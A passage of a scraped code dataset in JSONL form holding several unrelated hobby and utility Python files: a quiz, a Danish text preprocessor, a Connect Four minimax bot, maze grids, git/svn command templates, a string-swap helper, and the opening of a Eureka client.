\n","repo_name":"EduardoVaca/Competitive-Programming","sub_path":"InterviewBit/kth_smallest_in_tree.py","file_name":"kth_smallest_in_tree.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42043501147","text":"class Brainquizz():\n\n\n def __init__(self,qlist):\n self.qn = 0\n\n self.ql = qlist\n\n def nextquestion(self):\n import sys\n score = 0\n se = self.ql[self.qn].text\n self.qn += 1\n new = input(f\"Q.{self.qn} {se} (True/False): \")\n anss = self.ql[self.qn -1].answer\n print(\"input off to exit qizz\")\n print(\"this is your ans\",new)\n print(\"this is right answer\",anss)\n if new == anss:\n score = score+1\n elif new == \"off\":\n sys.exit()\n print(\"your score\" ,score)\n\n\n\n","repo_name":"RajeevPrakashAD1/python_projects","sub_path":"nwe project quiz/brainquizz.py","file_name":"brainquizz.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8730979550","text":"import csv\nimport os\nimport shutil\nimport warnings\nimport swifter\n\nimport lemmy as lemmy\nimport pandas as pd\nimport numpy as np\nfrom nltk import SnowballStemmer\n\nfrom danlp.models import load_spacy_model\n\nimport re\n\nfrom numpy import loadtxt\nfrom tqdm import tqdm\nfrom bs4 import BeautifulSoup\n\nfrom predict import config\n\nwarnings.filterwarnings(\"ignore\", category=UserWarning, module='bs4')\ntqdm.pandas()\n\n\nclass Preprocess:\n\n dfs = None\n shared = None\n for_predict = False\n\n def __init__(self, shared, env='staging', for_predict=False):\n\n self.shared = shared\n self.for_predict = for_predict\n self.nlp = load_spacy_model()\n self.stemmer = SnowballStemmer('danish')\n self.lemmatizer = lemmy.load('da')\n self.word_list = loadtxt(f'{config.BASE_PATH}/data/input/danish-words.txt', dtype=str)\n\n if not self.for_predict:\n\n print(\"[Preprocess] Start\")\n\n # If in dev-mode we delete existing data.\n if env == 'dev' and self.shared.exists:\n shutil.rmtree(f'{self.shared.folder}/{self.shared.hashed}')\n self.shared.set_exists(False)\n\n if not self.shared.exists:\n self.dfs = [\n # pd.read_csv(config.PATH_INPUT_COMMUNICATION, nrows=self.shared.nrows),\n pd.read_csv(config.PATH_INPUT_REQUEST, nrows=self.shared.nrows)\n ]\n for idx, df in enumerate(self.dfs):\n self.dfs[idx] = df.fillna('')\n self.run()\n else:\n print(f'\\tThere is already a preprocessing-folder for that configuration')\n print(f'\\tRemove the folder {self.shared.folder}/{self.shared.hashed} to rebuild it')\n\n print(\"[Preprocess] End\")\n print(\"\")\n\n\n def run(self):\n\n for i, df in enumerate(self.dfs):\n for idx in self.shared.dfs_index[i]:\n\n self.remove_html_tags(df, idx)\n\n if self.shared.lemmatize:\n self.lemmatize(df, idx)\n\n if self.shared.stemming:\n self.stemming(df, idx)\n\n if self.shared.stopwords is not None:\n self.remove_stopwords(df, idx, self.shared)\n\n if self.shared.replace_match_regex is not None:\n self.replace_match_regex(df, idx, self.shared)\n\n if self.shared.remove_special_chars:\n self.remove_special_chars(df, idx)\n\n if self.shared.remove_unknown_words:\n self.remove_unknown_words(df, idx)\n\n self.remove_extra_spaces(df, idx)\n\n if not self.for_predict:\n # Make a folder for the preprocessed files\n os.makedirs(f'{self.shared.folder}/{self.shared.hashed}')\n\n # Output the files\n for idx, df_name in enumerate(self.shared.dfs_names):\n self.dfs[idx].to_csv(f'{self.shared.folder}/{self.shared.hashed}/{df_name}.csv', quotechar='\"', quoting=csv.QUOTE_NONNUMERIC)\n for index in self.shared.dfs_index[idx]:\n self.dfs[idx].to_csv(f'{self.shared.folder}/{self.shared.hashed}/{df_name}_{index}.csv', quotechar='\"', quoting=csv.QUOTE_NONNUMERIC, columns=[index], index=False)\n\n # Saved the config as JSON\n f = open(f'{self.shared.folder}/{self.shared.hashed}/config.json', 'a')\n f.write(self.shared.get_json())\n f.close()\n\n @staticmethod\n def get_lemmatize(x, nlp, lemmatizer):\n doc = nlp(x)\n texts = []\n skip = False\n for idx, tok in enumerate(doc):\n text = tok.lower_\n # We keep the tokens between <>\n if tok.lower_ == '<':\n skip = True\n elif tok.lower_ == '>':\n skip = False\n text = \"\".join([e.text for e in doc[idx - 2: idx + 1]])\n # Some tokens we keep\n elif tok.lower_ in ['jer', 'mange']:\n text = tok.lower_\n # Some tokens we alter\n elif tok.lower_[-3:] == 'rne':\n text = tok.lower_[:-1]\n # Some tokens we remove\n elif tok.lower_ in [',']:\n continue\n else:\n text = lemmatizer.lemmatize(tok.tag_, tok.lower_)[0]\n if not skip:\n texts.append(text)\n return \" \".join(texts)\n\n def lemmatize(self, df, index):\n df[index] = df[index].swifter.apply(Preprocess.get_lemmatize, nlp=self.nlp, lemmatizer=self.lemmatizer)\n \"\"\"\n if self.for_predict:\n df[index] = df.apply(lambda x: Preprocess.get_lemmatize(x[index], self.nlp, self.lemmatizer), axis=1)\n else:\n df[index] = df.progress_apply(lambda x: Preprocess.get_lemmatize(x[index], self.nlp, self.lemmatizer), axis=1)\n \"\"\"\n\n\n @staticmethod\n def get_stemmer(line, stemmer):\n text = \" \".join([stemmer.stem(e) for e in line.split(\" \")])\n return text\n\n def stemming(self, df, index):\n if self.for_predict:\n df[index] = df.apply(lambda x: Preprocess.get_stemmer(x[index], self.stemmer), axis=1)\n else:\n df[index] = df.progress_apply(lambda x: Preprocess.get_stemmer(x[index], self.stemmer), axis=1)\n\n @staticmethod\n def get_remove_html_tags(x):\n text = BeautifulSoup(x, \"lxml\").text\n text = text.replace(u'\\u00A0', ' ')\n return text\n\n def remove_html_tags(self, df, index):\n df[index] = df[index].swifter.apply(Preprocess.get_remove_html_tags)\n \"\"\"\n if self.for_predict:\n df[index] = df.apply(lambda x: Preprocess.get_remove_html_tags(x[index]), axis=1)\n else:\n df[index] = df.progress_apply(lambda x: Preprocess.get_remove_html_tags(x[index]), axis=1)\n\n \"\"\"\n\n @staticmethod\n def get_replace_match(line, regex_dict):\n text = line\n values = list(regex_dict.values())\n for i, e in enumerate(list(regex_dict.keys())):\n regexes = values[i]\n for regex in regexes:\n text = re.sub(regex, f' {e} ', text)\n return text\n\n def replace_match_regex(self, df, index, shared):\n if self.for_predict:\n df[index] = df.apply(lambda x: Preprocess.get_replace_match(x[index], shared.replace_match_regex), axis=1)\n else:\n df[index] = df.progress_apply(lambda x: Preprocess.get_replace_match(x[index], shared.replace_match_regex), axis=1)\n\n @staticmethod\n def get_remove_stopwords(line, stopwords):\n text = \" \".join([e for e in line.split(\" \") if e not in stopwords])\n return text\n\n def remove_stopwords(self, df, index, shared):\n df[index] = df.swifter.apply(lambda x: Preprocess.get_remove_stopwords(x[index], shared.stopwords), axis=1)\n \"\"\"\n if self.for_predict:\n df[index] = df.apply(lambda x: Preprocess.get_remove_stopwords(x[index], shared.stopwords), axis=1)\n else:\n df[index] = df.progress_apply(lambda x: Preprocess.get_remove_stopwords(x[index], shared.stopwords), axis=1)\n \"\"\"\n\n @staticmethod\n def get_remove_special_chars(text):\n text = re.sub('[^\\w\\s.<>]', ' ', text)\n text = re.sub('_', ' ', text)\n return text\n\n def remove_special_chars(self, df, index):\n if self.for_predict:\n df[index] = df.apply(lambda x: Preprocess.get_remove_special_chars(x[index]), axis=1)\n else:\n df[index] = df.progress_apply(lambda x: Preprocess.get_remove_special_chars(x[index]), axis=1)\n\n @staticmethod\n def get_remove_extra_spaces(text):\n text = re.sub('\\s\\s+', ' ', text)\n text = text.strip()\n return text\n\n def remove_extra_spaces(self, df, index):\n if self.for_predict:\n df[index] = df.apply(lambda x: Preprocess.get_remove_extra_spaces(x[index]), axis=1)\n else:\n df[index] = df.progress_apply(lambda x: Preprocess.get_remove_extra_spaces(x[index]), axis=1)\n\n @staticmethod\n def get_remove_unknown_words(x, bad_words):\n text = \" \".join([e for e in x.split(\" \") if e.lower() not in bad_words])\n return text\n\n def remove_unknown_words(self, df, index):\n words_dictionary = [e.lower() for e in self.word_list]\n lines = df[index].to_numpy()\n words = np.concatenate([[g.lower() for g in e.split(\" \")] for e in lines])\n words = np.unique(words)\n bad_words = [e for e in words if e not in words_dictionary]\n df[index] = df[index].swifter.apply(Preprocess.get_remove_unknown_words, bad_words=bad_words)\n # df[index] = df.progress_apply(lambda x: Preprocess.get_remove_unknown_words(x[index], self.word_list), axis=1)","repo_name":"T0mmy0lsen/IHLP-Helper","sub_path":"backend/saved/predict/model/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":8803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17292006772","text":"from seq2seq.seq2seqAvg import Seq2seqModel\nfrom util.intGradAnalyzer import AvgGrad\nimport importlib\nfrom util.config import *\nimport numpy as np\nimport argparse\nimport sys\nimport tensorflow as tf\n\n# to call a specific config file run as python3 seq2seq_avg.py util.myconfig\n# where the config file is at util/myconfig.py\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"data\", help=\"data set\", type=str)\nparser.add_argument(\"model_folder\", help=\"where saved model is\", type=str)\nparser.add_argument(\"h5\", help=\"best weights\", type=str)\nparser.add_argument(\"val_set\", help=\"set to predict on\", type=str)\nparser.add_argument(\"--step_size\", help=\"number of steps for integrated gradients\", default=50, type=int)\nparser.add_argument(\"-s\", \"--start\", default=0, type=int)\nargs = parser.parse_args()\n\n# get config\nsys.path.append(args.model_folder)\nfrom config import *\n\nfrom keras.backend.tensorflow_backend import set_session\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.4\nconfig.gpu_options.visible_device_list = \"0\"\nset_session(tf.Session(config=config))\n\n# get config file\nif args.data == 'Amazon':\n Config = AmazonConfig()\nelif args.data == 'Sentiment':\n Config = SentimentConfig()\n\nseq2seqModel = Seq2seqModel()\nevent2vec_lstm_model = seq2seqModel.createModel(Config)\nevent2vec_lstm_model.load_weights(args.h5)\nprint(event2vec_lstm_model.summary())\n\nattenAnalyzer = AvgGrad()\nattenAnalyzer.runGrad(Config, event2vec_lstm_model, args.model_folder, args.val_set, args.start, args.step_size)\nprint(__file__)\n\n","repo_name":"stephanieger/sequence-explainability","sub_path":"seq2seq_avg_int_grad.py","file_name":"seq2seq_avg_int_grad.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4419216213","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"todos\",\n version=\"0.0.2\",\n author=\"chincherpa\",\n author_email=\"accounts@mail.de\",\n description=\"Python CLI to manage your todos, with comments, tags and colors\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/chincherpa/todos\",\n packages=setuptools.find_packages(),\n entry_points={\"console_scripts\": [\"t=todos.todos:main\"]},\n python_requires='>=3.6',\n)\n","repo_name":"chincherpa/todos","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12953658158","text":"import copy\n\n\ndef defaultPrintBoard(Connect4):\n print('\\u250C\\u2500\\u2500\\u2500'+'\\u252C\\u2500\\u2500\\u2500'*(Connect4.width-1)+'\\u2510')\n for i in range(Connect4.height):\n string=''\n for j in range(Connect4.width):\n string+={1:' x \\u2502',-1:' o \\u2502',0:' \\u2502'}[Connect4.board[Connect4.height-1-i][j]]\n print('\\u2502'+string)\n # print('\\u251C\\u2500\\u2500\\u2500'+'\\u253C\\u2500\\u2500\\u2500'*(self.width-1)+'\\u2524')\n finalLine=''\n for column in range (0, Connect4.width):\n finalLine+='\\u2502 ' + str(column) + ' '\n finalLine+='\\u2502\\n\\u2514\\u2500\\u2500\\u2500'+'\\u2534\\u2500\\u2500\\u2500'*(Connect4.width-1)+'\\u2518'\n print(finalLine)\n print('Gamelog: '+str(Connect4.gameLog))\n\n\nclass Connect4:\n def __init__(self, pP, pN, pPparam={}, pNparam={}, height: int=6, width: int=7, printBoard=defaultPrintBoard) -> None:\n # someone help rename players\n self.currPlayer=1 # current player\n self.pP=pP # player positive\n self.pPpar=pPparam # player positive parameters\n self.pN=pN # player negative\n self.pNpar=pNparam # player negative parameters\n\n self.printBoard=lambda: printBoard(self)\n \n print(self.pP)\n self.board=[[0 for column in range(0, width)] for row in range(0, height)]\n self.height=height\n self.width=width\n self.gameLog=[]\n self.winner=None\n self.game()\n\n def game(self) -> None:\n self.printBoard()\n while True:\n if self.currPlayer==1:\n ai=self.pP(self, **self.pPpar)\n else:\n ai=self.pN(self, **self.pNpar)\n column=ai.move()\n self.makeMove(column)\n self.printBoard()\n if self.winCheck():\n self.winner=self.currPlayer\n print(\"Winner: \" + str(self.currPlayer))\n return\n if self.tieCheck():\n self.winner=0\n print(\"Tie\")\n return\n self.currPlayer*=-1\n\n def makeMove(self, column):\n for row in range(0, self.height):\n if self.board[row][column]==0:\n self.board[row][column]=self.currPlayer\n self.gameLog.append(column)\n return\n print('Error: full column')\n \n def winCheck(self):\n for row in range(0, len(self.board)): #horizontals\n for column in range(0, len(self.board[0])-3):\n if self.currPlayer==self.board[row][column]==self.board[row][column+1]==self.board[row][column+2]==self.board[row][column+3]:\n return True\n for row in range(0, len(self.board)-3): #verticals\n for column in range(0, len(self.board[0])):\n if self.currPlayer==self.board[row][column]==self.board[row+1][column]==self.board[row+2][column]==self.board[row+3][column]:\n return True\n for row in range(0, len(self.board)-3): #diagonals\n for column in range(0, len(self.board[0])-3):\n # /\n if self.currPlayer==self.board[row][column]==self.board[row+1][column+1]==self.board[row+2][column+2]==self.board[row+3][column+3]:\n return True\n # \\\n if self.currPlayer==self.board[row+3][column]==self.board[row+2][column+1]==self.board[row+1][column+2]==self.board[row][column+3]:\n return True\n return False\n\n def tieCheck(self):\n if len(self.gameLog)==self.height*self.width:\n return True\n return False\n\n\nclass DumBot:\n def __init__(self, game):\n self.game=game\n self.board=self.game.board\n \n def move(self):\n for column in range(0, len(self.board[0])):\n if self.board[-1][column]==0:\n return column\n print('Error: full board')\n\n\nclass HumanBot:\n def __init__(self, game):\n self.possibleMoves=[str(c) for c in range(len(game.board[0])) if game.board[-1][c]==0]\n pass\n\n def move(self):\n column=\"\"\n while not(column in self.possibleMoves):\n column=input('Type a column: ')\n return int(column)\n\n\nclass LinearScorer:\n def __init__(self, board, linearKey=lambda line: 0 if ((1 in line) and (-1 in line)) else sum(line)) -> None:\n self.board=board\n self.height=len(board)\n self.width=len(board[0])\n self.linearKey=linearKey\n\n def score(self):\n score=0\n for i in range (self.height):\n for j in range (self.width-3):\n line=[self.board[i][j],self.board[i][j+1],self.board[i][j+2],self.board[i][j+3]]\n score+=self.linearKey(line=line)\n for i in range (self.height-3):\n for j in range (self.width):\n line=[self.board[i][j],self.board[i+1][j],self.board[i+2][j],self.board[i+3][j]]\n score+=self.linearKey(line=line)\n for i in range (self.height-3):\n for j in range (self.width-3):\n line=[self.board[i][j],self.board[i+1][j+1],self.board[i+2][j+2],self.board[i+3][j+3]]\n score+=self.linearKey(line=line)\n line=[self.board[i][j+3],self.board[i+1][j+2],self.board[i+2][j+1],self.board[i+3][j]]\n score+=self.linearKey(line=line)\n return score\n\n\nclass RootMinimax:\n def __init__(self, game, depth: int=6, scorer=LinearScorer) -> None:\n self.board=game.board[:][:]\n self.depth=depth\n self.scorer=scorer\n self.currPlayer=game.currPlayer\n self.gameLen=len(game.gameLog)\n\n def move(self) -> int:\n possibleMoves=[c for c in range(len(self.board[0])) if self.board[-1][c]==0]\n scores={}\n for move in possibleMoves:\n tempBoard=copy.deepcopy(self.board[:][:])\n for row in range(0, len(tempBoard)):\n if tempBoard[row][move]==0:\n tempBoard[row][move]=self.currPlayer\n break\n c=ChildMinimax(board=tempBoard, depth=self.depth-1, scorer=self.scorer, currPlayer=-self.currPlayer, gameLen=self.gameLen+1)\n scores[move]=c.score()\n if self.currPlayer==1:\n return max(scores.items(), key=lambda x: x[1])[0]\n return min(scores.items(), key=lambda x: x[1])[0]\n\n\nclass ChildMinimax:\n def __init__(self, board, depth, scorer, currPlayer, gameLen) -> None:\n self.board=board[:][:]\n self.depth=depth\n self.scorer=scorer\n self.currPlayer=currPlayer\n self.gameLen=gameLen\n\n def score(self) -> float or int:\n # base cases\n if self.winCheck():\n return -self.currPlayer*float('inf')\n if self.tieCheck():\n return 0\n if self.depth==0:\n scorer=self.scorer(self.board)\n return scorer.score()\n\n\n # iterate through list of possible children and score each child\n # we don't need to keep track of which move is best bc this isn't the root\n possibleMoves=[c for c in range(len(self.board[0])) if self.board[-1][c]==0]\n scores=[]\n for move in possibleMoves:\n tempBoard=copy.deepcopy(self.board)\n for row in range(0, len(tempBoard)):\n if tempBoard[row][move]==0:\n tempBoard[row][move]=self.currPlayer\n break\n c=ChildMinimax(board=tempBoard, depth=self.depth-1, scorer=self.scorer, currPlayer=-self.currPlayer, gameLen=self.gameLen+1)\n scores.append(c.score())\n \n if self.currPlayer==1:\n return max(scores)\n return min(scores)\n\n def winCheck(self) -> bool:\n for row in range(0, len(self.board)): #horizontals\n for column in range(0, len(self.board[0])-3):\n if -self.currPlayer==self.board[row][column]==self.board[row][column+1]==self.board[row][column+2]==self.board[row][column+3]:\n return True\n for row in range(0, len(self.board)-3): #verticals\n for column in range(0, len(self.board[0])):\n if -self.currPlayer==self.board[row][column]==self.board[row+1][column]==self.board[row+2][column]==self.board[row+3][column]:\n return True\n for row in range(0, len(self.board)-3): #diagonals\n for column in range(0, len(self.board[0])-3):\n # /\n if -self.currPlayer==self.board[row][column]==self.board[row+1][column+1]==self.board[row+2][column+2]==self.board[row+3][column+3]:\n return True\n # \\\n if -self.currPlayer==self.board[row+3][column]==self.board[row+2][column+1]==self.board[row+1][column+2]==self.board[row][column+3]:\n return True\n return False\n\n def tieCheck(self) -> bool:\n if self.gameLen==len(self.board)*len(self.board[0]):\n return True\n return False\n\n\nif __name__ == \"__main__\":\n c=Connect4(HumanBot, RootMinimax, pNparam={'depth':4})","repo_name":"apksqrd/Connect-Four-Minimax","sub_path":"Conect Four v2.py","file_name":"Conect Four v2.py","file_ext":"py","file_size_in_byte":9053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33045165938","text":"from typing import List, Optional\n\nfrom maze.grid import Grid\nfrom maze.grid.triangle_cell import TriangleCell\n\n\nclass TriangleWithRectangularShapeGrid(Grid):\n def __init__(self, rows: int = 10, columns: int = 10):\n self.rows = rows\n self.columns = columns\n self.grid: List[List[Optional[TriangleCell]]] = []\n for l in range(self.rows):\n line = []\n for c in range(self.columns):\n line.append(None)\n self.grid.append(line)\n self.prepare_grid()\n self.configure_cells()\n\n def prepare_grid(self):\n for r in range(self.rows):\n for c in range(self.columns):\n self.grid[r][c] = TriangleCell(r, c)\n\n def configure_cells(self):\n for r in range(self.rows):\n for c in range(self.columns):\n if self.grid[r][c] is not None:\n if self.grid[r][c].is_upright:\n self.grid[r][c].south = self.get_cell(r + 1, c)\n else:\n self.grid[r][c].north = self.get_cell(r - 1, c)\n self.grid[r][c].west = self.get_cell(r, c - 1)\n self.grid[r][c].east = self.get_cell(r, c + 1)\n\n\nimport math\n\n\nclass TriangleWithTriangularShapeGrid(TriangleWithRectangularShapeGrid):\n def __init__(self, size: int):\n self.size = size\n super().__init__(rows=size, columns=size)\n\n def prepare_grid(self):\n for l in range(math.ceil(self.size / 2)):\n for c in range(l, self.size - l):\n self.grid[self.size - l - 1][c] = TriangleCell(self.size - l - 1, c)\n","repo_name":"Keirua/mazes-py","sub_path":"maze/grid/triangle_grid.py","file_name":"triangle_grid.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35738340135","text":"\"\"\"tools module commands\"\"\"\n\nfrom devops_toolset.core.ValueDictsBase import ValueDictsBase\nfrom devops_toolset.core.app import App\n\napp: App = App()\n\n\nclass Commands(ValueDictsBase):\n \"\"\"Commands for the tools module.\"\"\"\n\n # Add your core literal dictionaries here\n _commands = {\n \"git_init\": \"git init {path}\",\n \"git_add\": \"git add .\",\n \"git_commit_m\": \"git commit -m \\\"{message}\\\"\",\n \"git_push_tag\": \"git {auth} push origin {tag_name}\",\n \"git_push_tag_delete\": \"git {auth} push --delete origin {tag_name}\",\n \"git_tag_add\": \"git tag -a {tag_name} {commit_name} -m {tag_name}\",\n \"git_tag_check\": \"git {auth} ls-remote {remote_name} \\\"refs/tags/{tag_name}\\\"\",\n \"git_tag_delete\": \"git tag -d {tag_name}\",\n \"public_ip_address_service_url\": \"http://checkip.dyndns.org\",\n \"git_auth\": \"-c http.extraheader=\\\"AUTHORIZATION: {auth_header}\\\"\",\n \"svn_add\": \"svn add \\\"{files_glob}\\\"\",\n \"svn_checkin\": \"svn ci -m \\\"{comment}\\\" --username {username} --password {password}\",\n \"svn_checkout\": \"svn co \\\"{url}\\\" \\\"{local_path}\\\"\",\n \"svn_copy\": \"svn cp \\\"{origin}\\\" \\\"{destination}\\\"\"\n }\n","repo_name":"aheadlabs/devops-toolset","sub_path":"src/devops_toolset/tools/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"21309957611","text":"# \"Easy things are hard.\" -> 'Problem 12= Flip 1 and 2 in 1+2=3 in this sentence.' \n\nimport hashlib\nimport random\n\n# helper function\ndef print_and_log(message, log_name):\n # Print the message to the console\n print(repr(message))\n print(message)\n\n # Append the message to the specified log file\n with open(log_name, 'a') as log_file:\n log_file.write(repr(message) + '\\n')\n\n\n# Helper Function\ndef string_get_seed_from_sha256_hash(input_string, log_name):\n \"\"\"\n turn input_string into a sha256 hash\n to use a seed to randomly but repeatably\n \"\"\"\n\n # start hash\n string_hash = hashlib.sha256()\n\n # remove escape characters\n input_string = input_string.replace(\"\\\\\", \"\")\n\n # remove escape ch\n # aracters\n input_string = input_string.replace(\"\\\\\\\\\", \"\")\n\n print_and_log(f\"input string for seed: {input_string}\", log_name)\n\n # hash the string\n string_hash.update(input_string.encode('utf-8'))\n\n # make the hash an int not hex\n string_hash = string_hash.hexdigest()\n\n print_and_log(f\"hash for seed: {string_hash}\", log_name)\n\n return string_hash\n\n\n# helper_function\ndef swap_two(input_string, item_1, item_2):\n \"\"\"\n Swap two items in a string. Tada!\n\n or change only the first item, the 2nd item is optional.\n\n protection from swap-collisions is included\n \"\"\"\n\n original_string = input_string\n\n # validity sanity check (item_2 is optional, only item 1 is needed)\n if item_1 not in input_string:\n print(f\"NOTHING DONE: item to match not in string -> {item_1} vs. {input_string}\")\n return input_string\n\n use_this_placeholder = ';;;<<<'\n\n \"\"\"all possible ascii placeholders, and more:\n while there is a risk of item 1 or two coliding with the placeholder\n there is also a risk of the placeholder coliding with part of the string\n the longer the string, the more likely it contains any given single\n ascii character \n \"\"\"\n placeholder_list = [\n '!!!\"\"\"', '###$$$', '%&%&%&', \"'''(((\", ')))***', \n '+++,,,', '---...', '///000', '111222', '333444', \n '555666', '777888', '999:::', ';;;<<<', '===>>>', \n '???@@@', 'AAABBB', 'CCCDDD', 'EEEFFF', 'GGGHHH', \n 'IIIJJJ', 'KKKLLL', 'MMMNNN', 'OOOPPP', 'QQQRRR', \n 'SSSTTT', 'UUUVVV', 'WWWXXX', 'YYYZZZ', '[[[sss', \n ']]]^^^', '___```', 'aaabbb', 'cccddd', 'eeefff', \n 'ggghhh', 'iiijjj', 'kkklll', 'mmmnnn', 'oooppp', \n 'qqqrrr', 'sssttt', 'uuuvvv', 'wwwxxx', 'yyyzzz', \n '{|{{|||', '}~}~}~~~',\n '!', '\"', '#', '$', '%', '&', \"'\", '(', \n ')', '*', '+', ',', '-', '.', '/', '0', '1', \n '2', '3', '4', '5', '6', '7', '8', '9', ':', \n ';', '<', '=', '>', '?', '@', 'A', 'B', 'C', \n 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', \n 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', \n 'V', 'W', 'X', 'Y', 'Z', '[', ']', '^', \n '_', '`', 'a', 'b', 'c', 'd', 'e', 'f', 'g', \n 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', \n 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', \n 'z', '{', '|', '}', '~', \n ]\n\n \"\"\"\n check that:\n item_2 is not in placeholder\n that placeholder does not collide with something in string\n \"\"\"\n placeholder_ok = False\n for this_placeholder in placeholder_list:\n print(f\"trying -> '{this_placeholder}'\")\n if (item_1 not in this_placeholder) and (item_2 not in this_placeholder) and (this_placeholder not in input_string):\n use_this_placeholder = this_placeholder\n placeholder_ok = True\n print(f\"use_this_placeholder -> {use_this_placeholder}\")\n break\n else:\n print(\"collision detected, try next placeholder...\")\n\n if not placeholder_ok:\n # print error message and exit program\n message = \"\"\"FAILED: collision error, \n for swap_two(), \n a new placeholder needed. \n action item: add novel option to placeholder_list\n \"\"\"\n print(message)\n sys.exit()\n\n # Replace item_1 with a temporary placeholder\n output_swapped_string = input_string.replace(item_1, use_this_placeholder)\n print(output_swapped_string)\n\n # Replace item_2 with item_1\n output_swapped_string = output_swapped_string.replace(item_2, item_1)\n print(output_swapped_string)\n\n # Replace that temporary placeholder with item_2 (done and done)\n output_swapped_string = output_swapped_string.replace(use_this_placeholder, item_2)\n\n message = f\"\"\"\n Final comarison:\n old -> {original_string}\n new -> {output_swapped_string}\n \"\"\"\n print(message)\n\n return output_swapped_string\n\n\n# helper function\ndef apply_swap(input_string, log_name, error_description, item_1, item_2):\n \"\"\"\n requires: \n import hashlib\n import random\n \n requires/uses helper functions:\n print_and_log(message, log_name)\n string_get_seed_from_sha256_hash(input_string, 1)\n swap_two(selected_segment, item_1, item_2)\n \n This function: \n input parameters: apply_swap(input_string, log_name, error_description, item_1, item_2)\n \n apply_swap() function logs and applies a swap\n to an equation, deterministically-randomly to some segment of the equation,\n where the item is found,\n\n It checks for indices where both match\n or where at least one matches\n or where none match\n and deterministically-randomly selects from those.\n \n produces a cumulative description of changes made 'error_description' (string)\n and appends to a cumulative log file-document: file-path->log_name\n \"\"\"\n\n print_and_log(f\"start apply_swap({input_string}, log_name, {item_1}, {item_2})\", log_name)\n\n if item_1 not in input_string:\n print_and_log(f\"no match: {item_1} -> {input_string} \", log_name)\n return input_string, error_description\n\n # step 1: input original string and potentially two items to change in it\n original_equation = input_string\n\n # Step 2: Split string on \"=\"\n list_of_splits = input_string.split(\"=\")\n\n print_and_log(f\"Initial list_of_splits: {list_of_splits}\", log_name)\n\n # Step 3: Randomly pick one split using string_get_seed_from_sha256_hash() for random seed\n \"\"\"\n have the input to see include more than just the equation,\n or every change may similarly be made to the same segment\n \"\"\"\n input_to_seed = input_string + item_1 + item_2\n seed = string_get_seed_from_sha256_hash(input_to_seed, log_name)\n random.seed(seed)\n # log\n print_and_log(seed, log_name)\n\n # pick a random item-index in list WHERE the item is found.\n \"\"\"\n Return a list of indices from `list_of_splits` where the string contains \n ideally both `item_1` and `item_2`, if not that\n item_1\n \"\"\"\n filtered_indices = [index for index, s in enumerate(list_of_splits) if item_1 in s and item_2 in s]\n if not filtered_indices:\n filtered_indices = [index for index, s in enumerate(list_of_splits) if item_1 in s]\n\n # check length:\n if not filtered_indices:\n print_and_log(f\"no match: {input_string} {item_1}\", log_name)\n return input_string\n\n # select randomly from optional indices where fine items are found\n chosen_split_index = random.choice(filtered_indices)\n\n # log\n print_and_log(f\"chosen_split_index: {chosen_split_index}\", log_name)\n\n # Step 4: Make a change in only that one split picked\n selected_segment = list_of_splits[chosen_split_index]\n # apply\n modified_split = swap_two(selected_segment, item_1, item_2)\n # log\n print_and_log(f\"modified_split: {modified_split}\", log_name)\n\n # Replace the chosen split with the modified one\n list_of_splits[chosen_split_index] = modified_split\n\n # Step 5: Re-combine list_of_splits\n result_string = \"=\".join(list_of_splits)\n\n\n ###################\n # Log Changes Made\n ###################\n\n if item_1 in original_equation:\n message = f\"Changed {item_1} to {item_2}\"\n print_and_log(message, log_name)\n error_description += message + \"; \"\n\n if item_2 in original_equation:\n message = f\"Changed {item_2} to {item_1}\"\n print_and_log(message, log_name)\n error_description += message + \"; \"\n\n # log\n print_and_log(f\"Final string: {result_string}\", log_name)\n\n message = f\"\"\"\n Final equation comarison:\n old -> {original_equation}\n new -> {result_string}\n \"\"\"\n print_and_log(message, log_name)\n\n # Step 6: Return string\n return result_string, error_description\n\n\n##############\n# example run\n##############\nlog_name = \"log.txt\"\nerror_description = \"So far...\"\n# apply_swap(input_string, log_name, error_description, item_1, item_2)\nresult = apply_swap(\"applebanana=cherrybanana=cherrybanana\", log_name, error_description, \"a\", \"b\")\n\nprint(f\"Result: {result}\")\n","repo_name":"lineality/simple_swap_python","sub_path":"apply_simple_swap.py","file_name":"apply_simple_swap.py","file_ext":"py","file_size_in_byte":8866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41476825745","text":"\"\"\"\n Eureka Client\n\"\"\"\n\nimport json\nimport logging\nimport os\nimport random\nimport time\nfrom threading import Thread\n\ntry:\n from urllib.parse import urljoin\nexcept ImportError:\n from urlparse import urljoin\n\nimport dns.resolver\n\nfrom .ec2metadata import get_metadata\nfrom .httpclient import HttpClientObject, ApiException\nfrom .hostinfo import HostInfo\n\nlogger = logging.getLogger('service.eureka')\n\nclass EurekaClientException(Exception):\n pass\n\n\nclass EurekaRegistrationFailedException(EurekaClientException):\n pass\n\n\nclass 